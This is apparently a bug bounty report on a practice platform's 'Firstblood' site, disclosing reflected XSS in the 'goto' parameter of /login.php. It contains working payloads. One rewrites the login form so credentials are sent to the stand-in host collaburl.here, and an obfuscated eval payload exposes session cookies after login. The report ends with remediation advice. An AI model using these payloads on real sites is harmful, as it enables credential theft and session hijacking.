BugBountyHunter

Summary

The parameter goto is vulnerable to XSS. Additionally, the parameter carries over when logging in as a doctor.

Steps to reproduce

1. Visit /login.php?goto="><a/href=javascript:confirm`1`>
2. Try to click the username field - a confirm dialog should appear showing 1

PoC - steal credentials from login page

Visit /login.php?goto="/type=hidden></form/x><form/action=//collaburl.here/test.php?formsubmit><x/a. The link has been fitted with a payload to

1. Close the input tag we inject into
2. Close the original form tag on the page
3. Create a new form tag pointing at a URL we control
4. Create a random element to hide the leftovers from destroying the hidden input goto that would otherwise display

If we submit our credentials from this page now, the request will go to //collaburl.here/test.php?formsubmit instead of the intended /login.php at Firstblood and our server now has a record of the user's credentials. In a real world scenario, a malicious actor would probably forward the victim back to /login.php with the same credentials, thus making the attack much more difficult to spot.

Another payload

1. Visit

   /login.php?goto=javascript:eval.call`${`confirm${unescape`%2528`}document.cookie${unescape`%2529`}`}`

2. Log in as any doctor
3. When logged in, an XSS should trigger displaying the cookie

Screenshots

Before logging in

After logging in

Impact

Arbitrary JavaScript execution on the login page of doctors and when logging in. Basically, the first payload lets us steal credentials, the second payload lets us hijack the logged in session.

Remediation

goto should be sanitized before being reflected back to the user, both in the login form on login.php and in the response when logged in after a POST request to login.php.